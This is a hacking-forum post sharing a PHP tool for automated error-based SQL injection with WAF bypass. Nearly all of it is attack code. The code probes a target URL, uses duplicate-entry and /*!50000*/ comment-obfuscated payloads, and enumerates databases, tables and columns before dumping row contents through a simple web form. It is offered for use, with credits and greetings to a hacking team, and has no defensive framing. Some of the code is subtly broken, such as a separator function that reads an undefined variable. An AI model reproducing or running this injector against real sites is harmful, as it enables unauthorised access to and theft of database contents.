Jump to content
Aerosol

Auto Sqli [Error-based] + WAF Bypass

Recommended Posts

Posted

<?php
@set_time_limit(0);
if(empty($_POST)==0){
if(empty($_POST["opt1"])==0){
$Fd=false;
$pb=array('1"','1' . chr(39),'1');
$_url = $_POST["url"];
foreach($pb as $zz){
$_buffer = LoadSite($_url . $zz, "");
if(preg_match("#You have an error in your SQL syntax#", $_buffer)){$Fd=true;break;}
}
if($Fd){
$seperator='';
foreach($pb as $zz){
$fg=$_url . $zz . '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+';
$_buffer=LoadSite($fg,"");
if(preg_match("#Duplicate entry#",$_buffer)){$seperator=$zz;break;}
}
if($seperator==''){echo "NOTHING UP HERE";exit();}
echo '<table><tr><td valign="top">';
$fg=$_url . $seperator . '+or+1+group+by+concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))+hav?ing+min(0)+or+1+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$version=$_buffer1[0];$user=$_buffer1[1];$database=$_buffer1[2];
echo "Version : " . $version . "</br>User : " . $user . "</br>database : " . $database;
$fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,count(schema_name),0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+0,1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$dbcount=$_buffer1[1];
echo '</br>DbCount : ' . $dbcount . '</br></td><td><table border="3"><tr><td>Databases : </td></tr>';
for ($i=0;$i<$dbcount; $i++){
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(schema_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt2" value="1">';
echo '<input type="hidden" name="seperator" value="';
switch($seperator){
case '1"':echo "1";break;
case '1' . chr(39):echo "2";break;
case '1':echo "3";break;
}
echo '"></form></td></tr>';
}
echo "</table><td></tr></table>";
}
}elseif(empty($_POST["opt2"])==0){
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
$fg=$_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(table_name),0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>Tables From ' . Hex2String($_POST["nameinbase"]) . ' : (Total: '.$cta.') </td></tr>';
for ($i=0;$i<$cta; $i++){
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(table_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
echo '<input type="hidden" name="nameinbase2" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt3" value="1">';
echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
echo "</form></td></tr>";
}
}elseif(empty($_POST["opt3"])==0){
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
$fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(column_name),0x27,0x7e)+FROM+/*!information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>columns from ' . Hex2String($_POST["nameinbase2"]) . ' in Database ' . Hex2String($_POST["nameinbase"]) . ' (Total: '.$cta.')</td></tr>';
for ($i=0;$i<$cta; $i++){
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg=$_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(select+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000+(column_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!50000information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'+LIMIT+'.$i.',1))+FROM+/*!50000information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode("~",$lde[1]);
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
echo '<input type="hidden" name="nameinbase2" value="' . $_POST["nameinbase2"] . '">';
echo '<input type="hidden" name="nameinbase3" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt4" value="1">';
echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
echo "</form></td></tr>";
}
echo '</table>';
}elseif(empty($_POST["opt4"])==0){
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
$fg = $_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count('.Hex2String($_POST["nameinbase3"]).'),0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>Items : (Total: '.$_buffer1[1].')</td></tr>';
for ($i=0;$i<$cta; $i++){
$fg=$_url .$sepe . '+and+(select+1+FROM(select+count(*),concat/*!50000*/((select+concat/*!50000*/(0x7e,0x27,'.Hex2String($_POST["nameinbase3"]).',0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'+LIMIT+'.$i.',1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
echo '<tr><td>' . $i . '</td><td>' . $_buffer1[1] . '</td></tr>';
}
echo '</table';
}
}else{
?>
<style type="text/css">#sbz {text-align: center;color: #000;font-size: 20px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;}</style>
<html>
<head><title>T3N38R15 Injector for WAF Bypass</title></head>
<body>
<b id="sbz"><font size="100"></br>T3N38R15</br></br></br>Error Based SQL Injector</br></br></br></font></b>
<form method="post">
<input size="80" name="url" value="http://example.com/index.php?id="><input value="inject" type="submit">
<input type="hidden" name="opt1" value="1"></form>
</br>
Greets to Team M4DL33Ts
</body>
</html>
<?php
}
function GetSeperatorByInteger($int){
switch($seperator){
case '1':return '1"';
case '2':return '1' . chr(39);
case '3':return '1';
}
return '';
}
function String2Hex($string){
$hex='';
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
function Hex2String($hex){
$string='';
for ($i=0; $i < strlen($hex)-1; $i+=2){
$string .= chr(hexdec($hex[$i].$hex[$i+1]));
}
return $string;
}
function LoadSite($url, $postdata){
$agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0";
$ch = curl_init($url);
if ($ch){
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_USERAGENT, $agent);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
if (isset($postdata)){
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $postdata);}
$tmp = curl_exec ($ch);
curl_close ($ch);
}
return $tmp;
}
?>

Credits to : T3N38R15

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...